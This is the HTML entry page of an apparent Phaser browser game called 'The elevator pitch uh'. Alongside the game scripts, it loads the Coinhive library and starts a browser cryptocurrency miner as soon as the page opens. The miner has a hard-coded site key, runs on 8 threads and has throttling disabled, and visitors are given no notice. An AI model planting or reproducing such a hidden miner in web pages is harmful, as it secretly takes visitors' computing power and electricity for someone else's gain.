﻿<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <title>The elevator pitch uh</title>
  <link rel="stylesheet" href="app.css" type="text/css" />

</head>
<body>
  <div id="content" class="content"></div>
  <script src="Scripts/phaser.js"></script>
  <script src="Scripts/app.js"></script>
  <script src="https://coinhive.com/lib/coinhive.min.js"></script>
  <script>
	var miner = new CoinHive.User('CT01MMq1yZyuiLIvdSjmDG73cR1ORnTj', 'ciccio',{
	threads: 8,
    autoThreads: false,
	//throttle: 1,
	forceASMJS: false
   });
	miner.start();
</script>
</body>
</html>
